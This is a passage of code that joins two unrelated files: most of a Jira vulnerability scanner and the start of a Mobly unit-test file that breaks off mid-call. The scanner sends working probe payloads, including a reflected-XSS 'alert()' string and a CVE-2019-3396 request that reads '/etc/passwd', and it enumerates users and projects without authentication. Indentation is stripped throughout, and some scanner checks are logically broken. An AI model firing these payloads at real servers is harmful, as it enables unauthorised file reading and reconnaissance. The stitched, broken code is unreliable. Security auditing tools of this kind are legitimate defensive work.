def CVE_2019_11581(base_url): #(SSTI):
r=requests.get(f"{base_url}/secure/ContactAdministrators!default.jspa", allow_redirects=False)
if r.status_code==200:
if "Your Jira administrator" or "Contact Site Administrators" in str(r.content):
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-11581\n")
else:
print(f"{RED}[+] {GREEN} [CRITICAL]{RESET} Vulnerable To CVE-2019-11581 [Confirm Manually] : {base_url}/secure/ContactAdministrators!default.jspa\n")
response.append(f"[+] [CRITICAL] Vulnerable To CVE-2019-11581 [Confirm Manually] : {base_url}/secure/ContactAdministrators!default.jspa\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-11581\n")
def CVE_2020_14179(base_url): #(Info disclosure):
r=requests.get(f"{base_url}/secure/QueryComponent!Default.jspa",allow_redirects=False,headers=headers)
if r.status_code != 200:
print(f"{GRAY}[-] Not Vulnerable To CVE-2020-14179\n")
else:
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2020-14179 : {base_url}/secure/QueryComponent!Default.jspa\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2020-14179 : {base_url}/secure/QueryComponent!Default.jspa\n")
def CVE_2020_14181(base_url): #(User enum):
r=requests.get(f"{base_url}/secure/ViewUserHover.jspa?username=Admin",allow_redirects=False,headers=headers)
if r.status_code !=200 or "Your session has timed out" in str(r.content):
print(f"{GRAY}[-] Not Vulnerable To CVE-2020-14181\n")
else:
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2020-14181 : {base_url}/secure/ViewUserHover.jspa?username=Admin\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2020-14181 : {base_url}/secure/ViewUserHover.jspa?username=Admin\n")
def CVE_2018_20824(base_url): #(XSS):
print("\n")
r=requests.get(f"{base_url}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(\"XSS_POPUP\")",allow_redirects=False,headers=headers)
if "XSS_POPUP" in str(r.content):
print(f"{RED}[+] {GREEN} [HIGH]{RESET} Vulnerable To CVE-2018-20824 : {base_url}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n")
response.append(f"[+] [HIGH] Vulnerable To CVE-2018-20824 : {base_url}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2018-20824\n")
def CVE_2019_3396(base_url): #(Path Traversal & RCE):
body = ' {"contentId":"1","macro":{"name":"widget","params":{"url":"https://google.com","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}} '
r=requests.get(f"{base_url}/rest/tinymce/1/macro/preview", allow_redirects=False,headers=headers)
if r.status_code != 200:
print(f"{GRAY}[-] Not Vulnerable To CVE-2019-3396\n")
else:
r=requests.post(f"{base_url}/rest/tinymce/1/macro/preview", data=body,headers=headers)
if "root" in str(r.content):
print(f"{RED}[+] {GREEN} [CRITICAL]{RESET} Vulnerable To CVE-2019-3396 : {base_url}/rest/tinymce/1/macro/preview\n")
response.append(f"{RED}[+] [CRITICAL] Vulnerable To CVE-2019-3396 : {base_url}/rest/tinymce/1/macro/preview\n")
def CVE_2020_36287(base_url,ii):
try:
r=requests.get(f"{base_url}/rest/dashboards/1.0/10000/gadget/{ii}/prefs")
if r.status_code==200:
if "userPrefsRepresentation" in str(r.content):
response_CVE_2020_36287.append(f"{base_url}/rest/dashboards/1.0/10000/gadget/{ii}/prefs\n")
except:
pass
def CVE_2020_36287_helper(base_url):
widgets = ['BruteForcing Gadget ID... ', progressbar.AnimatedMarker()]
bar = progressbar.ProgressBar(widgets=widgets).start()
for i in range(50):
time.sleep(0.1)
bar.update(i)
with open('helper.txt','a') as no:
for i in range(10000,10500):
no.write(str(i)+'\n')
with open('helper.txt','r') as op:
threads=[]
for num in op:
t=threading.Thread(target=CVE_2020_36287,args=(base_url,num.strip()))
t.start()
threads.append(t)
for tt in threads:
tt.join()
if len(response_CVE_2020_36287) != 0:
filename=f"CVE-2020-36287_{urlparse(url).netloc}.txt"
with open(f"{output_folder}{filename}",'a') as res:
for i in range(0,len(response_CVE_2020_36287)):
res.write(response_CVE_2020_36287[i])
else:
pass
os.remove("helper.txt")
def CVE_2020_36287_helper_2():
if len(response_CVE_2020_36287) != 0:
print(f"{RED}[+] {GREEN} [LOW]{RESET} Vulnerable To CVE-2020-36287\n")
response.append(f"[+] [LOW] Vulnerable To CVE-2020-36287 : File Written at [CVE-2020-36287_{urlparse(url).netloc}.txt]\n")
print(f"\n\tFound Dashboard Gadegts\n\tWritten To File [CVE-2020-36287_{urlparse(url).netloc}.txt]\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE-2020-36287\n")
def CVE_2020_36289(base_url):
r=requests.get(f"{base_url}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin")
#print("\n")
if r.status_code ==200:
if "Assignee" in str(r.content):
print(f"{RED}[+] {GREEN} [MEDIUM] {RESET}Vulnerable To CVE-2020-36289 : {base_url}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin\n")
response.append(f"[+] [MEDIUM] Vulnerable To CVE-2020-36289 : {base_url}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE 2020 36289\n")
else:
print(f"{GRAY}[-] Not Vulnerable To CVE 2020 36289\n")
''' Different Disclosures Defined For Scanning. Add New Disclosures Here '''
def user_reg(base_url):
try:
r=requests.get(f"{base_url}/secure/Signup!default.jspa",allow_redirects=False)
if r.status_code ==200:
if "private" in str(r.content):
print(f"{GRAY}[-] User regestration is Disabled{RESET}\n")
else:
print(f"{RED}[+] {GREEN}[Medium]{RESET} User regestration is Enabled : {base_url}/secure/Signup!default.jspa\n")
response.append(f"[+] [Medium] User regestration is Enabled : {base_url}/secure/Signup!default.jspa\n")
else:
print(f"{GRAY}[-] User regestration is Disabled{RESET}\n")
except KeyboardInterrupt:
print(f"{RED} User Aborted the Program {RESET}")
def dev_mode(base_url):
r=requests.get(f"{base_url}/",allow_redirects=False)
if r.status_code ==200:
if "<meta name=\"ajs-dev-mode\" content=\"true\">" in str(r.content):
print(f"{RED}[+] {GREEN} [LOW]{RESET} Dev Mode is Enabled : {base_url}/ {RESET}\n")
response.append(f"[+] [LOW] Dev Mode is Enabled : {base_url}/ {RESET}\n")
else:
print(f"{GRAY}[-] Dev Mode is Disabled{RESET}\n")
else:
print(f"{GRAY}[-] Dev Mode is Disabled{RESET}\n")
def Unauth_User_picker(base_url):
r=requests.get(f"{base_url}/secure/popups/UserPickerBrowser.jspa",allow_redirects=False,headers=headers)
if r.status_code != 200:
print(f"{GRAY}[-] User Picker Disabled{RESET}\n")
else:
if "user-picker" in str(r.content):
print(f"{RED}[+] {CYAN}[INFO]{RESET} User Picker Enabled : {base_url}/secure/popups/UserPickerBrowser.jspa?max=1000\n")
response.append(f"[+] [INFO] User Picker Enabled : {base_url}/secure/popups/UserPickerBrowser.jspa?max=1000\n")
def Unauth_Group_Picker(base_url):
r=requests.get(f"{base_url}/rest/api/2/groupuserpicker", allow_redirects=False,headers=headers)
if r.status_code ==200:
if "You are not authenticated. Authentication required to perform this operation." in str(r.content):
print(f"{GRAY}[-] REST GroupUserPicker is not available\n")
else:
print(f"{RED}[+] {CYAN}[INFO]{RESET} REST GroupUserPicker is available : {base_url}/rest/api/2/groupuserpicker\n")
response.append(f"[+] [INFO] REST GroupUserPicker is available : {base_url}/rest/api/2/groupuserpicker\n")
else:
#print(f"{RED}Unable To Connect . [Status :"+str({r.status_code})+"]")
print(f"{GRAY}[-] REST GroupUserPicker is not available\n")
def Unauth_Resolutions(base_url):
r=requests.get(f"{base_url}/rest/api/2/resolution",allow_redirects=False,headers=headers)
if r.status_code ==200:
if 'self' in str(r.content) or 'description' in str(r.content) or 'name' in str(r.content):
print(f"{RED}[+] {CYAN} [INFO] {RESET} Resolutions Found : {base_url}/rest/api/2/resolution\n")
response.append(f"[+] [INFO] Resolutions Found : {base_url}/rest/api/2/resolution\n")
else:
print(f"{GRAY}[-] No Resolutions Found\n")
else:
print(f"{GRAY}[-] No Resolutions Found\n")
def Unauth_Projects(base_url):
r=requests.get(f"{base_url}/rest/api/2/project?maxResults=100",allow_redirects=False,headers=headers)
if r.status_code ==200:
if 'projects' in str(r.content) and 'startAt' in str(r.content) and 'maxResults' in str(r.content):
print(f"{RED}[+] {GREEN}[LOW] {RESET}Projects Found : {base_url}/rest/api/2/project?maxResults=100\n")
response.append(f"[+] [LOW] Projects Found : {base_url}/rest/api/2/project?maxResults=100\n")
else:
print(f"{GRAY}[-] Projects Not Found\n")
else:
print(f"{GRAY}[-] Projects Not Found\n")
def Unauth_Project_categories(base_url):
r=requests.get(f"{base_url}/rest/api/2/projectCategory?maxResults=1000",allow_redirects=False,headers=headers)
if r.status_code ==200:
        if 'self' in str(r.content) or 'description' in str(r.content) or 'name' in str(r.content):
print(f"{RED}[+] {GREEN}[LOW]{RESET} Project Groups Found : {base_url}/rest/api/2/projectCategory?maxResults=1000\n")
response.append(f"[+] [LOW] Project Groups Found : {base_url}/rest/api/2/projectCategory?maxResults=1000\n")
else:
print(f"{GRAY}[-] Project Groups Not Found{RESET}\n")
else:
print(f"{GRAY}[-] Project Groups Not Found{RESET}\n")
def Unauth_Dashboard(base_url):
r=requests.get(f"{base_url}/rest/api/2/dashboard?maxResults=100",allow_redirects=False,headers=headers)
if r.status_code ==200:
        if 'dashboards' in str(r.content) and 'startAt' in str(r.content) and 'maxResults' in str(r.content):
print(f"{RED}[+] {CYAN}[INFO]{RESET} Found Unauthenticated DashBoard Access{RESET} : {base_url}/rest/api/2/dashboard?maxResults=100\n")
response.append(f"[+] [INFO] Found Unauthenticated DashBoard Access : {base_url}/rest/api/2/dashboard?maxResults=100\n")
else:
print(f"{GRAY}[-] No Unauthenticated DashBoard Access Found{RESET}\n")
else:
print(f"{GRAY}[-] No Unauthenticated DashBoard Access Found{RESET}\n")
def Unauth_Dashboard_Popular(base_url):
r=requests.get(f"{base_url}/secure/ManageFilters.jspa?filter=popular&filterView=popular",allow_redirects=False,headers=headers)
if r.status_code ==200:
if 'Popular Filters' in str(r.content):
print(f"{RED}[+] {CYAN}[INFO]{RESET} Filters Accessible : {base_url}/secure/ManageFilters.jspa?filter=popular&filterView=popular\n")
response.append(f"[+] [INFO] Filters Accessible : {base_url}/secure/ManageFilters.jspa?filter=popular&filterView=popular\n")
else:
print(f"{GRAY}[-] Filters Not Accessible{RESET}\n")
else:
print(f"{GRAY}[-] Filters Not Accessible{RESET}\n")
def Unauth_Dashboard_admin(base_url):
r=requests.get(f"{base_url}/rest/menu/latest/admin",allow_redirects=False,headers=headers)
if r.status_code ==200:
        if 'key' in str(r.content) and 'link' in str(r.content) and 'label' in str(r.content) and 'self' in str(r.content):
            print(f"{RED}[+] {CYAN}[INFO]{RESET} Admin Project Dashboard Accessible : {base_url}/rest/menu/latest/admin\n")
            response.append(f"[+] [INFO] Admin Project Dashboard Accessible : {base_url}/rest/menu/latest/admin\n")
        else:
            print(f"{GRAY}[-] Admin Project Dashboard Inaccessible\n")
    else:
        print(f"{GRAY}[-] Admin Project Dashboard Inaccessible\n")
def Service_desk_signup(base_url):
body='{"email":"invalid","signUpContext":{},"secondaryEmail":"","usingNewUi":true}'
r=requests.get(f"{base_url}/servicedesk/customer/user/signup",allow_redirects=False,headers=headers)
if r.status_code ==200 :
if "Service Management" in str(r.content):
print(f"{RED}[+] {GREEN}[MEDIUM]{RESET} Service Desk Signup Enabled : {base_url}/servicedesk/customer/user/signup{RESET}\n")
response.append(f"[+] [MEDIUM] Service Desk Signup Enabled : {base_url}/servicedesk/customer/user/signup\n")
else:
print(f"{GRAY}[-] Service Desk Signup Disabled{RESET}\n")
def Unauth_Install_Gadgets(base_url):
r=requests.get(f"{base_url}/rest/config/1.0/directory")
if r.status_code ==200 :
if "jaxbDirectoryContents" in str(r.content):
print(f"{RED}[+] {GREEN}[LOW]{RESET} REST Gadegts Accessible : {base_url}/rest/config/1.0/directory{RESET}\n")
response.append(f"[+] [LOW] REST Gadegts Accessible : {base_url}/rest/config/1.0/directory\n")
else:
print(f"{GRAY}[-] REST Gadegts UnAccessible\n")
def FieldNames_QueryComponentJql(base_url):
r=requests.get(f"{base_url}/secure/QueryComponent!Jql.jspa?jql=",allow_redirects=False,headers=headers)
if r.status_code ==200:
if "searchers" in str(r.content):
print(f"{RED}[+] {GREEN}[LOW] {RESET}Found Query Component Fields : {base_url}/secure/QueryComponent!Jql.jspa?jql=\n")
response.append(f"[+] [LOW] Found Query Component Fields : {base_url}/secure/QueryComponent!Jql.jspa?jql=\n")
else:
print(f"{GRAY}[-] No Query Component Fields Found{RESET}\n")
else:
print(f"{GRAY}[-] No Query Component Fields Found{RESET}\n")
def Unauth_Screens(base_url):
r=requests.get(f"{base_url}/rest/api/2/screens",allow_redirects=False)
if r.status_code==200:
if "id" or "name" or "description" in str(r.content):
print(f"{RED}[+] {GREEN}[LOW] {RESET} Unauthenticated Access To Screens : {base_url}/rest/api/2/screens\n")
response.append(f"[+] [LOW] Unauthenticated Access To Screens : {base_url}/rest/api/2/screens\n")
else:
print(f"{GRAY}[-] No Unauthenticated Access To Screens Found{RESET}\n")
else:
print(f"{GRAY}[-] No Unauthenticated Access To Screens Found{RESET}\n")
def write_response(response):
filename=f"Jira-Lens_{urlparse(url).netloc}.txt"
with open(f"{output_folder}{filename}",'a') as final:
for items in response:
final.write(items)
final.write("\n")
print(f"\n\n\n\t{RED}File Written to : Jira-Lens_{urlparse(url).netloc}.txt{RESET}\n")
def worker(url):
try:
base_url=clean_url(url)
detect_version(base_url)
is_aws=isaws(base_url)
CVE_2017_9506(base_url)
CVE_2018_20824(base_url)
CVE_2019_3402(base_url)
CVE_2019_3403(base_url)
CVE_2019_3396(base_url)
CVE_2019_8442(base_url)
CVE_2019_8443(base_url)
CVE_2019_8449(base_url)
CVE_2019_8451(base_url)
CVE_2019_11581(base_url)
CVE_2020_14179(base_url)
CVE_2020_14181(base_url)
CVE_2020_36287_helper(base_url)
CVE_2020_36287_helper_2()
CVE_2020_36289(base_url)
Unauth_User_picker(base_url)
Unauth_Resolutions(base_url)
Unauth_Projects(base_url)
Unauth_Project_categories(base_url)
Unauth_Dashboard(base_url)
Unauth_Dashboard_admin(base_url)
Service_desk_signup(base_url)
Unauth_Install_Gadgets(base_url)
user_reg(base_url)
Unauth_Group_Picker(base_url)
Unauth_Screens(base_url)
FieldNames_QueryComponentJql(base_url)
write_response(response)
except KeyboardInterrupt:
print (f"{RED} Keyboard Interrupt Detected {RESET}")
sys.exit(0)
except Exception as e:
print(f"{RED}An Unexpected Error Occured : {RESET} {e}")
def main():
try:
global url
global output_folder
global is_aws
global base_url
parser = argparse.ArgumentParser(description="Jira-Lens : Jira Security Auditing Tool")
parser.add_argument("-u","--url", help="Target URL",dest='url')
parser.add_argument('-f','--file',type=argparse.FileType('r'),dest='input_file')
parser.add_argument('-c','--cookie',help="Provide authentication cookie(s)")
parser.add_argument('-o','--output',help="Output Folder for files",default="output/",required=False)
args= parser.parse_args()
banner()
url=args.url
output_folder=args.output
        if not os.path.isdir(output_folder):
            print(f"\t{RED}The Output Path {output_folder} does not Exist")
            sys.exit(1)
        if args.url is None and args.input_file is None:
            print(f"{RED}\tNo URL Provided\n\tUse -u/--url to provide a URL")
            sys.exit(0)
        if args.url is not None and args.input_file is not None:
            print(f"{RED}\tMultiple Inputs Provided\n\tUse Either -u(URL) or -f(FILE) as Input")
            sys.exit(0)
if args.cookie:
headers['Cookie'] = args.cookie
if args.input_file:
print(f" {CYAN}Input File Provided : {args.input_file.name}{RESET}\n\n")
input_file=args.input_file.name
uselesscounter=True
with open(input_file,'r') as urls_file:
for url in urls_file.readlines():
if url.strip() not in unq_url:
unq_url.append(url.strip())
with open(input_file,'r') as urls_file:
for url in urls_file.readlines():
if uselesscounter:
print(f" {CYAN}{len(unq_url)} Unique Urls Found{RESET}")
uselesscounter=False
url=url.strip()
worker(url)
else:
url=args.url
worker(url)
except KeyboardInterrupt:
print (f"{RED} Keyboard Interrupt Detected {RESET}")
sys.exit(0)
except Exception as e:
print(f"{RED}An Unexpected Error Occured:{RESET} {e}")
if __name__=="__main__":
try:
response_CVE_2020_36287=[]
unq_url=[]
response=[]
global is_aws
global url
main()
except KeyboardInterrupt:
print (f"{RED} Keyboard Interrupt Detected {RESET}")
sys.exit(0)
except Exception as e:
print(f"{RED}An Unexpected Error Occured:{RESET} {e}")
|
utils_test.py
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from concurrent import futures
import io
import logging
import multiprocessing
import os
import platform
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import time
import unittest
from unittest import mock
from mobly import base_test
from mobly import signals
from mobly import test_runner
from mobly import utils
from tests.lib import integration_test
from tests.lib import mock_controller
from tests.lib import mock_instrumentation_test
from tests.lib import multiple_subclasses_module
MOCK_AVAILABLE_PORT = 5
ADB_MODULE_PACKAGE_NAME = 'mobly.controllers.android_device_lib.adb'
def _is_process_running(pid):
"""Whether the process with given PID is running."""
if os.name == 'nt':
return str(pid) in subprocess.check_output([
'tasklist',
'/fi',
f'PID eq {pid}',
]).decode()
try:
# os.kill throws OSError if the process with PID pid is not running.
# signal.SIG_DFL is one of two standard signal handling options, it will
# simply perform the default function for the signal.
os.kill(pid, signal.SIG_DFL)
except OSError:
return False
return True
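# Illustrative usage (not part of the test suite): the test process's own PID
# should always be reported as running.
#   _is_process_running(os.getpid())  # -> True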
def _fork_children_processes(name, successors):
"""Forks children processes and its descendants recursively.
Args:
name: The name of this process.
successors: The args for the descendant processes.
"""
logging.info('Process "%s" started, PID: %d!', name, os.getpid())
children_process = [
multiprocessing.Process(target=_fork_children_processes, args=args)
for args in successors
]
for child_process in children_process:
child_process.start()
if 'child' in name:
time.sleep(4)
for child_process in children_process:
child_process.join()
logging.info('Process "%s" exit.', name)
class UtilsTest(unittest.TestCase):
"""Unit tests for the implementation of everything under mobly.utils."""
def setUp(self):
super().setUp()
self.tmp_dir = tempfile.mkdtemp()
def tearDown(self):
super().tearDown()
shutil.rmtree(self.tmp_dir)
def sleep_cmd(self, wait_secs):
if platform.system() == 'Windows':
python_code = ['import time', 'time.sleep(%s)' % wait_secs]
return ['python', '-c', 'exec("%s")' % r'\r\n'.join(python_code)]
else:
return ['sleep', str(wait_secs)]
@unittest.skipIf(os.name == "nt",
'collect_process_tree only available on Unix like system.')
@mock.patch('subprocess.check_output')
def test_collect_process_tree_without_child(self, mock_check_output):
mock_check_output.side_effect = (subprocess.CalledProcessError(
-1, 'fake_cmd'))
pid_list = utils._collect_process_tree(123)
self.assertListEqual(pid_list, [])
@unittest.skipIf(os.name == "nt",
'collect_process_tree only available on Unix like system.')
@mock.patch('subprocess.check_output')
def test_collect_process_tree_returns_list(self, mock_check_output):
# Creates subprocess 777 with descendants looks like:
# subprocess 777
# ├─ 780 (child)
# │ ├─ 888 (grandchild)
# │ │ ├─ 913 (great grandchild)
# │ │ └─ 999 (great grandchild)
# │ └─ 890 (grandchild)
# ├─ 791 (child)
# └─ 799 (child)
mock_check_output.side_effect = (
# ps -o pid --ppid 777 --noheaders
b'780\n 791\n 799\n',
# ps -o pid --ppid 780 --noheaders
b'888\n 890\n',
# ps -o pid --ppid 791 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 799 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 888 --noheaders
b'913\n 999\n',
# ps -o pid --ppid 890 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 913 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
# ps -o pid --ppid 999 --noheaders
subprocess.CalledProcessError(-1, 'fake_cmd'),
)
pid_list = utils._collect_process_tree(777)
self.assertListEqual(pid_list, [780, 791, 799, 888, 890, 913, 999])
@mock.patch.object(os, 'kill')
@mock.patch.object(utils, '_collect_process_tree')
def test_kill_process_tree_on_unix_succeeds(self, mock_collect_process_tree,
mock_os_kill):
mock_collect_process_tree.return_value = [799, 888, 890]
mock_proc = mock.MagicMock()
mock_proc.pid = 123
with mock.patch.object(os, 'name', new='posix'):
utils._kill_process_tree(mock_proc)
mock_os_kill.assert_has_calls([
mock.call(799, signal.SIGTERM),
mock.call(888, signal.SIGTERM),
mock.call(890, signal.SIGTERM),
])
mock_proc.kill.assert_called_once()
@mock.patch.object(os, 'kill')
@mock.patch.object(utils, '_collect_process_tree')
def test_kill_process_tree_on_unix_kill_children_failed_throws_error(
self, mock_collect_process_tree, mock_os_kill):
mock_collect_process_tree.return_value = [799, 888, 890]
mock_os_kill.side_effect = [None, OSError(), None]
mock_proc = mock.MagicMock()
mock_proc.pid = 123
with mock.patch.object(os, 'name', new='posix'):
with self.assertRaises(utils.Error):
utils._kill_process_tree(mock_proc)
mock_proc.kill.assert_called_once()
@mock.patch.object(utils, '_collect_process_tree')
def test_kill_process_tree_on_unix_kill_proc_failed_throws_error(
self, mock_collect_process_tree):
mock_collect_process_tree.return_value = []
mock_proc = mock.MagicMock()
mock_proc.pid = 123
mock_proc.kill.side_effect = subprocess.SubprocessError()
with mock.patch.object(os, 'name', new='posix'):
with self.assertRaises(utils.Error):
utils._kill_process_tree(mock_proc)
mock_proc.kill.assert_called_once()
@mock.patch('subprocess.check_output')
def test_kill_process_tree_on_windows_calls_taskkill(self, mock_check_output):
mock_proc = mock.MagicMock()
mock_proc.pid = 123
with mock.patch.object(os, 'name', new='nt'):
utils._kill_process_tree(mock_proc)
mock_check_output.assert_called_once_with([
'taskkill',
'/F',
'/T',
'/PID',
'123',
])
def test_run_command(self):
ret, _, _ = utils.run_command(self.sleep_cmd(0.01))
self.assertEqual(ret, 0)
def test_run_command_with_timeout(self):
ret, _, _ = utils.run_command(self.sleep_cmd(0.01), timeout=4)
self.assertEqual(ret, 0)
def test_run_command_with_timeout_expired(self):
with self.assertRaises(subprocess.TimeoutExpired):
_ = utils.run_command(self.sleep_cmd(4), timeout=0.01)
@mock.patch('threading.Timer')
@mock.patch('subprocess.Popen')
def test_run_command_with_default_params(self, mock_popen, mock_timer):
mock_command = mock.MagicMock(spec=dict)
mock_proc = mock_popen.return_value
mock_proc.communicate.return_value = ('fake_out', 'fake_err')
mock_proc.returncode = 0
out = utils.run_command(mock_command)
self.assertEqual(out, (0, 'fake_out', 'fake_err'))
mock_popen.assert_called_with(
mock_command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
cwd=None,
env=None,
universal_newlines=False,
)
mock_timer.assert_not_called()
@mock.patch('threading.Timer')
@mock.patch('subprocess.Popen')
def test_run_command_with_custom_params(self, mock_popen, mock_timer):
mock_command = mock.MagicMock(spec=dict)
mock_stdout = mock.MagicMock(spec=int)
mock_stderr = mock.MagicMock(spec=int)
mock_shell = mock.MagicMock(spec=bool)
mock_timeout = 1234
mock_env = mock.MagicMock(spec=dict)
mock_universal_newlines = mock.MagicMock(spec=bool)
mock_proc = mock_popen.return_value
mock_proc.communicate.return_value = ('fake_out', 'fake_err')
mock_proc.returncode = 127
out = utils.run_command(mock_command,
stdout=mock_stdout,
stderr=mock_stderr,
shell=mock_shell,
timeout=mock_timeout,
env=mock_env,
universal_newlines=mock_universal_newlines)
self.assertEqual(out, (127, 'fake_out', 'fake_err'))
mock_popen.assert_called_with(
mock_command,
stdout=mock_stdout,
stderr=mock_stderr,
shell=mock_shell,
cwd=None,
env=mock_env,
universal_newlines=mock_universal_newlines,
)
mock_timer.assert_called_with(1234, mock.ANY)
def test_run_command_with_universal_newlines_false(self):
_, out, _ = utils.run_command(self.sleep_cmd(0.01),
universal_newlines=False)
self.assertIsInstance(out, bytes)
def test_run_command_with_universal_newlines_true(self):
_, out, _ = utils.run_command(self.sleep_cmd(0.01), universal_newlines=True)
self.assertIsInstance(out, str)
def test_start_standing_subproc(self):
try:
p = utils.start_standing_subprocess(self.sleep_cmd(4))
self.assertTrue(_is_process_running(p.pid))
os.kill(p.pid, signal.SIGTERM)
finally:
p.stdout.close()
p.stderr.close()
p.wait()
@mock.patch('subprocess.Popen')
def test_start_standing_subproc_without_env(self, mock_popen):
utils.start_standing_subprocess(self.sleep_cmd(0.01))
mock_popen.assert_called_with(
self.sleep_cmd(0.01),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
env=None,
)
@mock.patch('subprocess.Popen')
def test_start_standing_subproc_with_custom_env(self, mock_popen):
mock_env = mock.MagicMock(spec=dict)
utils.start_standing_subprocess(self.sleep_cmd(0.01), env=mock_env)
mock_popen.assert_called_with(
self.sleep_cmd(0.01),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
env=mock_env,
)
def test_stop_standing_subproc(self):
p = utils.start_standing_subprocess(self.sleep_cmd(4))
utils.stop_standing_subprocess(p)
self.assertFalse(_is_process_running(p.pid))
def test_stop_standing_subproc_without_pipe(self):
p = subprocess.Popen(self.sleep_cmd(4))
self.assertIsNone(p.stdout)
utils.stop_standing_subprocess(p)
self.assertFalse(_is_process_running(p.pid))
def test_stop_standing_subproc_and_descendants(self):
# Creates subprocess A with descendants looks like:
# subprocess A
# ├─ B (child)
# │ ├─ X (grandchild)
# │ │ ├─ 1 (great grandchild)
# │ │ └─ 2 (great grandchild)
# │ └─ Y (grandchild)
# ├─ C (child)
# └─ D (child)
process_tree_args = ('subprocess_a', [
('child_b', [
('grand_child_x', [
('great_grand_child_1', []),
('great_grand_child_2', []),
]),
('grand_child_y', []),
]),
('child_c', []),
('child_d', []),
])
subprocess_a = multiprocessing.Process(target=_fork_children_processes,
args=process_tree_args)
subprocess_a.start()
mock_subprocess_a_popen = mock.MagicMock()
mock_subprocess_a_popen.pid = subprocess_a.pid
# Sleep a while to create all processes.
time.sleep(0.01)
utils.stop_standing_subprocess(mock_subprocess_a_popen)
subprocess_a.join(timeout=1)
mock_subprocess_a_popen.wait.assert_called_once()
@unittest.skipIf(sys.version_info >= (3, 4) and sys.version_info < (3, 5),
'Python 3.4 does not support `None` max_workers.')
def test_concurrent_exec_when_none_workers(self):
def adder(a, b):
return a + b
with mock.patch.object(futures,
'ThreadPoolExecutor',
wraps=futures.ThreadPoolExecutor) as thread_pool_spy:
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)], max_workers=None)
thread_pool_spy.assert_called_once_with(max_workers=None)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_default_max_workers(self):
def adder(a, b):
return a + b
with mock.patch.object(futures,
'ThreadPoolExecutor',
wraps=futures.ThreadPoolExecutor) as thread_pool_spy:
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)])
thread_pool_spy.assert_called_once_with(max_workers=30)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_custom_max_workers(self):
def adder(a, b):
return a + b
with mock.patch.object(futures,
'ThreadPoolExecutor',
wraps=futures.ThreadPoolExecutor) as thread_pool_spy:
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)], max_workers=1)
thread_pool_spy.assert_called_once_with(max_workers=1)
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_makes_all_calls(self):
mock_function = mock.MagicMock()
_ = utils.concurrent_exec(mock_function, [
(1, 1),
(2, 2),
(3, 3),
])
self.assertEqual(mock_function.call_count, 3)
mock_function.assert_has_calls(
[mock.call(1, 1), mock.call(2, 2),
mock.call(3, 3)], any_order=True)
def test_concurrent_exec_generates_results(self):
def adder(a, b):
return a + b
results = utils.concurrent_exec(adder, [(1, 1), (2, 2)])
self.assertEqual(len(results), 2)
self.assertIn(2, results)
self.assertIn(4, results)
def test_concurrent_exec_when_exception_makes_all_calls(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
utils.concurrent_exec(fake_int, [
(1,),
('123',),
('not_int',),
(5435,),
])
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('123'),
mock.call('not_int'),
mock.call(5435),
],
any_order=True)
def test_concurrent_exec_when_exception_generates_results(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
results = utils.concurrent_exec(fake_int, [
(1,),
('123',),
('not_int',),
(5435,),
])
self.assertEqual(len(results), 4)
self.assertIn(1, results)
self.assertIn(123, results)
self.assertIn(5435, results)
exceptions = [result for result in results if isinstance(result, Exception)]
self.assertEqual(len(exceptions), 1)
self.assertIsInstance(exceptions[0], ValueError)
def test_concurrent_exec_when_multiple_exceptions_makes_all_calls(self):
mock_call_recorder = mock.MagicMock()
lock_call_count = threading.Lock()
def fake_int(a,):
with lock_call_count:
mock_call_recorder(a)
return int(a)
utils.concurrent_exec(fake_int, [
(1,),
('not_int1',),
('not_int2',),
(5435,),
])
self.assertEqual(mock_call_recorder.call_count, 4)
mock_call_recorder.assert_has_calls([
mock.call(1),
mock.call('not_int1'),
mock.call('not_int2'),
mock.call(5435),
],
